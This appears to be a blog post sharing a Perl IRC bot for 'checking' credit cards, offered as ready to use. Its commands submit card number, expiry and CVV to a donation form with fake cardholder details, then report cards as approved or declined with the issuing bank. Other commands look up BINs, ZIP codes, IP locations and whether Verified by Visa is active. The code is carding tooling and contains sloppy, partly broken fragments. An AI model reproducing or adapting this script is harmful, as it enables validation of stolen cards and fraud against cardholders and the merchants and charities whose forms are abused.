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Script Bot Check CC, just modified the merchant and form, it will be worked ... :)
#Call to standalone modules directory BEGIN{push(@INC,'Modules');}
#Modules Inclusion use LWP::Socket; use LWP::UserAgent; use HTTP::Request; use Parallel::ForkManager; use MIME::Base64 (); use WWW::Mechanize; use WWW::Mechanize::FormFiller; use Socket; use IO::Socket; use IO::Socket::INET; use MIME::Base64;
$| = 1;
#Defines global variable/array my($irc_socket,$server,$port,$ident,$nick,$timeout,$rfi_test_cmd,$rfi_print_cmd,$parallel_fork); my(@chans,@admins,@user_agents);
if($msg{'what'} =~ /\!help/){ &respond_to_privmsg(\%msg," 6,1 Checker Status 9[ON] 8| 10IF You need Private Checker 0/msg HackAttack"); &respond_to_privmsg(\%msg," 0,1!chk <cc> <expdate> <cvv2> - 11 Visa , MasterCard");
} if($msg{'what'} =~ /\!chk 1 2 3/){
&respond_to_privmsg(\%msg,"$nick : invalid format <cc> <expdate> <cvv2>");
############################################################################################ ################################################################################## if($msg{'what'} =~ /\!chk status/ ) { open (FILE, "data.txt") or die "Can't open file: $!"; my ($lines) = (0); while (<FILE>) { $lines++; } &respond_to_privmsg(\%msg," 7,1#HackAttack 0: 14 Total 10$lines 14card checked 0- 100 14credit available"); } ################################ Status by HackAttack ################################ ##################################################################################
if($msg{'what'} =~ /\!chk\s(\d{16})\s(\d{4})\s(\d{3})/) { my ($numerocarta,$expmes,$verifica,$amount) = ($1,$2,$3,$4,$5,); my $var1 = substr($expmes,0,2); my $var2 = substr($expmes,2,4); my $range = 15; my $minimum =1.200 ; my $dolar = '$'; my $random_number = int(rand($range)) + $minimum;
my $rechecklist = "data.txt"; open FILE,"$rechecklist"; my @results = <FILE>; close FILE; my $chkResVar = 0; foreach my $cRes(@results) { if($cRes =~ /$numerocarta\|(.*)/) { $chkResVar = 1; &respond_to_privmsg(\%msg," 7,1 $nick 00: 03 $numerocarta 00: 4Already checked! "); goto finish; } }
my $agent = WWW::Mechanize->new( autocheck => 1,ssl_opts => {verify_hostname => 0},); my $formfiller = WWW::Mechanize::FormFiller->new(); $agent->env_proxy(); $agent->get(''); $agent->form_number(1) if $agent->forms and scalar @{$agent->forms}; $agent->form_number(1); { local $^W; $agent->current_form->value('concert-name', 'List my name in concert programs as'); }; { local $^W; $agent->current_form->value('donorname', 'mark smith'); }; { local $^W; $agent->current_form->value('memoriam', 'This gift is in memory of'); }; { local $^W; $agent->current_form->value('inmemory', 'This gift is in memory of honor'); }; { local $^W; $agent->current_form->value('creditCardType', 'varType'); }; { local $^W; $agent->current_form->value('CCnumber', ''.$numerocarta.''); }; { local $^W; $agent->current_form->value('CCexp', '20'.$var1.var2.''); }; { local $^W; $agent->current_form->value('ccv', ''.$verifica.''); }; { local $^W; $agent->current_form->value('realname', 'mark smith'); }; { local $^W; $agent->current_form->value('CCaddress', 'las heras 32'); }; { local $^W; $agent->current_form->value('city', 'Detroit'); }; { local $^W; $agent->current_form->value('state', 'AL'); }; { local $^W; $agent->current_form->value('zip_code', '05544'); }; { local $^W; $agent->current_form->value('phone', '1569841055'); }; $agent->submit(); print $agent->content,"\n"; my $allo=$agent->content; my $file = "data.txt"; open (MYFILE, ">>$file"); print MYFILE "$numerocarta|$expmes$expanio|$verifica\n"; close (MYFILE); my $allo=$agent->content; if ($allo =~/The transaction has been declined because of an AVS mismatch. /){ my $database = "banklist.txt"; open FILE,"$database" or die "Errore nell'apertura: $!"; my @results=<FILE>; close FILE; my $bankinfo = $1; my $nuova = substr($numerocarta,0,6); foreach my $url (@results){ if($url =~ m/$nuova\|(.*)/){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $dolar$random_number 7 0: 9APPROVED! - 14AVS mismatch 0,1- 7,1BANK 00: 10,1$1 | | | ");
print "card $variable!"; } } }elsif ($allo =~/This transaction has been declined./){
my $database = "banklist.txt"; open FILE,"$database" or die "Errore nell'apertura: $!"; my @results=<FILE>; close FILE; my $bankinfo = $1; my $nuova = substr($numerocarta,0,6); foreach my $url (@results){ if($url =~ m/$nuova\|(.*)/){ my $bankinfo = $1; &respond_to_privmsg(\%msg," 7,1 $nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $dolar$random_number 7 0: 4DECLINED - 14Declined 0,1- 7,1BANK 00: 10,1$1 | | | ");
print "card $variable!"; } } }elsif ($allo =~/A duplicate transaction has been submitted./){ &respond_to_privmsg(\%msg," 7,1$nick 00: 03 $numerocarta 00: 04 Already Checked! "); }elsif ($allo =~/Credit card expiration date is invalid./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta 00: 4is invalid. "); }elsif ($allo =~/There was a problem with your order./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4DECLINED! "); }elsif ($allo =~/The credit card has expired./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta 0: 4The credit card has expired."); }elsif ($allo =~/The credit card expiration date entered is not valid./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta 0: 4is not Valid "); }elsif ($allo =~/Transaction Error: A duplicate transaction has been submitted./){ &respond_to_privmsg(\%msg," 7,1$nick 00: 03 $numerocarta 00: 04 Already Checked! "); }elsif ($allo =~/A duplicate transaction has been submitted./){ &respond_to_privmsg(\%msg," 7,1$nick 00: 03 $numerocarta 00: 04 Already Checked! "); }elsif ($allo =~/The credit card number is invalid./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta 00: 4is invalid. "); }elsif ($allo =~/This transaction has been declined./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4DECLINED! "); }elsif ($allo =~/This transaction requires voice authentication/){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4Declined! "); }elsif ($allo =~/The credit card number is invalid./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta 00: 4is invalid. "); } }
if($msg{'what'} =~ /\!bank\s(\d{6})/){ my $bankinfo = $1; my $database = "banklist.txt"; open FILE,"$database" or die "Can't open file: $database"; my @results=<FILE>; close FILE; my $bankvar = 0; my $chkvar = 0; my $nuova = substr($bankinfo,0,6); foreach my $url (@results){ if($url =~ /$bankinfo\|(.*)/){ if($bankvar == 0) { $bankvar = 1; &respond_to_privmsg(\%msg," 3,01 $nuova 00: 10 10,1$1 "); goto finish; } } else{ $chkvar = 1; } } if($chkvar == 1) { &respond_to_privmsg(\%msg," 3,01 $nuova 00: 10 10,1Unknown "); } finish: }
if($msg{'what'} =~ /^!ip (.*)/) { my ($iploca) = ($1); &respond_to_privmsg(\%msg,""); print "\n"; my $agent = WWW::Mechanize->new( autocheck => 1 ); my $formfiller = WWW::Mechanize::FormFiller->new(); $agent->env_proxy(); $agent->get(''); $agent->form_number(1) if $agent->forms and scalar @{$agent->forms}; { local $^W; $agent->current_form->value('ip', ''.$iploca.''); }; $agent->submit(); print $agent->content,"\n"; my $ipse=$agent->content; if ($ipse =~ m/Your IP address is(.*)<br>City:(.*)<br\/>Country:(.*)<br>Continent:(.*)<br>Time/g){ my ($ipaddress,$city,$country,$continent) = ($1,$2,$3,$4); &respond_to_privmsg(\%msg," 7,1 Ip City 15: 9$city 0| 7Ip Country 15: 9$country 0| 7Continent 15: 9$continent"); } elsif ($ipse =~/Invalid address or IP not found/){ &respond_to_privmsg(\%msg," 4,1Invalid IP Address!"); } }
if($msg{'what'} =~ /\!ccnononononononononononono\s(\d{16})\s(\d{4})\s(\d{3})/) { my ($numerocarta,$expmes,$verifica,$amount) = ($1,$2,$3,$4,$5,); my $var1 = substr($expmes,0,2); my $var2 = substr($expmes,2,4); my $range = 15; my $minimum =100 ; my $random_number = int(rand($range)) + $minimum;
print "inizio mechanize sacha\n";
my $agent = WWW::Mechanize->new( autocheck => 1,ssl_opts => {verify_hostname => 0},); my $formfiller = WWW::Mechanize::FormFiller->new(); $agent->env_proxy(); $agent->get(''); $agent->form_number(1) if $agent->forms and scalar @{$agent->forms}; $agent->form_number(1); { local $^W; $agent->current_form->value('amount', 'other'); }; { local $^W; $agent->current_form->value('amountother', '0.1'); }; { local $^W; $agent->current_form->value('donationfor', 'Wherever most needed'); } { local $^W; $agent->current_form->value('fname', 'mark'); }; { local $^W; $agent->current_form->value('lname', 'smith'); }; { local $^W; $agent->current_form->value('address1', 'las heras 32'); }; { local $^W; $agent->current_form->value('city', 'Mebane'); }; { local $^W; $agent->current_form->value('state', 'AL'); }; { local $^W; $agent->current_form->value('zip', '05544'); }; { local $^W; $agent->current_form->value('country', 'United States'); }; { local $^W; $agent->current_form->value('email', ''); }; { local $^W; $agent->current_form->value('cctype', 'varType'); }; { local $^W; $agent->current_form->value('ccnumber', ''.$numerocarta.''); }; { local $^W; $agent->current_form->value('cvv', ''.$verifica.''); }; { local $^W; $agent->current_form->value('"exp_month', ''.$var1.''); }; { local $^W; $agent->current_form->value('"exp_year', ''.$var2.''); }; $agent->submit(); print $agent->content,"\n"; my $allo=$agent->content; if ($allo =~/Thank you for joining CyArk in digitally preserving our shared human history./){ my $database = "banklist.txt"; open FILE,"$database" or die "Errore nell'apertura: $!"; my @results=<FILE>; close FILE; my $bankinfo = $1; my $nuova = substr($numerocarta,0,6); foreach my $url (@results){ if($url =~ m/$nuova\|(.*)/){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $dolar$random_number 0: 9APPROVED! - 14AVS mismatch 0,1- 7,1BANK 00: 10,1$1 | | | ");
my $database = "banklist.txt"; open FILE,"$database" or die "Errore nell'apertura: $!"; my @results=<FILE>; close FILE; my $bankinfo = $1; my $nuova = substr($numerocarta,0,6); foreach my $url (@results){ if($url =~ m/$nuova\|(.*)/){ my $bankinfo = $1; &respond_to_privmsg(\%msg," 7,1 $nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $dolar$random_number 7 0: 4DECLINED - 14Declined 0,1- 7,1BANK 00: 10,1$1 | | | ");
print "card $variable!"; } } }elsif ($allo =~/A duplicate transaction has been submitted./){ &respond_to_privmsg(\%msg," 7,1$nick 00: 03 $numerocarta 00: 04 Already Checked! "); }elsif ($allo =~/Credit card expiration date is invalid./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4is invalid. - 14INVALID 0,1- 7,1BANK 00: 10,1$1 "); }elsif ($allo =~/There was a problem with your order./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4DECLINED! "); }elsif ($allo =~/The credit card has expired./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4DECLINED! The credit card has expired."); }elsif ($allo =~/The credit card expiration date entered is not valid./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4DECLINED! is not Valid "); }elsif ($allo =~/Transaction Error: A duplicate transaction has been submitted./){ &respond_to_privmsg(\%msg," 7,1$nick 00: 03 $numerocarta 00: 04 Already Checked! "); }elsif ($allo =~/A duplicate transaction has been submitted./){ &respond_to_privmsg(\%msg," 7,1$nick 00: 03 $numerocarta 00: 04 Already Checked! "); }elsif ($allo =~/Invalid Credit Card Number/){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4is invalid. "); }elsif ($allo =~/he following error message was returned: A duplicate transaction has been submitted./){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4DECLINED! "); }elsif ($allo =~/This transaction requires voice authentication/){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4Declined! "); }elsif ($allo =~/Invalid Credit Card Number/){ &respond_to_privmsg(\%msg," 7,1$nick 0: 3 $numerocarta $var1$var2 $verifica 0- 14,1 $random_number 7 USD 0: 4is invalid. "); } }
if($msg{'what'} =~ /^!zip\s+(\d{5})/) { my ($zipcheck) = ($1); &respond_to_privmsg(\%msg," 4,10 0Checking Zip... 4 0 $zipcheck"); print "\n"; my $agent = WWW::Mechanize->new( autocheck => 1 ); my $formfiller = WWW::Mechanize::FormFiller->new(); $agent->env_proxy(); $agent->get(''); $agent->form_number(1) if $agent->forms and scalar @{$agent->forms}; { local $^W; $agent->current_form->value('zip', ''.$zipcheck.''); }; $agent->submit(); print $agent->content,"\n"; my $zipse=$agent->content; if ($zipse =~/<td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font><\/td><td align=center>(.*)<\/font>/g){ my ($city) = ($1); my ($state) = ($2); &respond_to_privmsg(\%msg," 4,10 0Zipcode State 4 0 $state 4,10 0Zipcode City 4 9 $city"); } elsif ($zipse =~/is not currently assigned by the US Postal Service to any city./){ &respond_to_privmsg(\%msg," 4,10 0Zipcode City 4 0 Zip Not Found!"); } }
if($msg{'what'} =~ /^!sec\s+(\d{16})/){ open FILE,"SCRIPTS/ignored.txt"; my ($numerocarta,) = ($1,$2,$3,$4,); my $var1 = substr($expmes,0,2); my $var2 = substr($expmes,2,4); if (substr($numerocarta,0,1)==4) { $varType = 1; &respond_to_privmsg(\%msg," 4,1[ 0Checking VBV... 4] 0 $numerocarta"); } if (substr($numerocarta,0,1)==5) { $varType = 2; &respond_to_privmsg(\%msg," 4,1[ 0Checking MCSC.. 4] 0 $numerocarta"); } print "\n"; my $agent = WWW::Mechanize->new( autocheck => 1 ); my $formfiller = WWW::Mechanize::FormFiller->new(); $agent->env_proxy(); $agent->get(''); $agent->form_number(1) if $agent->forms and scalar @{$agent->forms}; $agent->form_number(1); { local $^W; $agent->current_form->value('cclist', ''.$numerocarta.''); }; $agent->submit(); print $agent->content,"\n"; my $allo=$agent->content; if ($allo =~/color=green>Probably Non VBV/){ &respond_to_privmsg(\%msg," 4,1[ 0Results........ 4] 0,12VBV 15,1 / 0,4MC 0,7SC 8,1 is 4Disabled!"); } if ($allo =~/color=green>Probably Non VBV/){ &respond_to_privmsg(\%msg," 4,1[ 0Results........ 4] 0,12VBV 15,1 / 0,4MC 0,7SC 8,1 is 4Disabled!"); } if ($allo =~/color=red>Probably VBV Active/){ &respond_to_privmsg(\%msg," 4,1[ 0Results........ 4] 0,12VBV 15,1 / 0,4MC 0,7SC 8,1 is 9Enabled!"); } if ($allo =~/color=red>Probably VBV Active/){ &respond_to_privmsg(\%msg," 4,1[ 0Results........ 4] 0,12VBV 15,1 / 0,4MC 0,7SC 8,1 is 9Enabled!"); } if ($allo =~/Not found in Database/) { &respond_to_privmsg(\%msg," 4,1[ 0Results........ 4] 0,12VBV 15,1 / 0,4MC 0,7SC 8,1 is 7Enabled!"); } toEnd: }
} } sub ctrl_admin() { my $data = $_[0]; foreach my $admin ( HackAttack ) { if($admin eq $data->{'from'}) { return(0); } } &respond_to_privmsg($data," 4YOU ARE NOT MY ADMIN"); return(-1); }
sub respond_to_privmsg() { my ($data,$m) = ($_[0],$_[1]); if($data->{'to'} =~ /#/) { &privmsg($data->{'to'},$m); } else { &privmsg($data->{'from'},$m); } }
sub urlencode() { my $str = $_[0]; $str =~ s/([^A-Za-z0-9])/sprintf("%%%02X", ord($1))/seg; return $str; }
sub unique() { my @unici = (); my %visti = (); foreach my $elemento (@_) { $elemento =~ s/\/+/\//g; next if $visti{$elemento}++; push @unici, $elemento; } return @unici; }
sub find_all_sites() { my ($data,$dork) = @_; my $tmp_file_name = rand(999999) . ".txt"; my @pids_array = (); my @data_links = (); my @site_finded = (); my @site_cleaned = (); $dork =~ s/[\r\n]//g;
&respond_to_privmsg($data," 15[ 7INFO 15] 12 START TO FIND ALL SITES FOR \"".$dork."\" ");
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Peraturan Berkomentar :
✔ Berkomentarlah Sesuai Artikel Diatas
✔ Untuk Berkomentar Gunakan (OpenID / Name URL / Google+)
✔ Berkomentarlah Menggunakan Bahasa Yang Jelas
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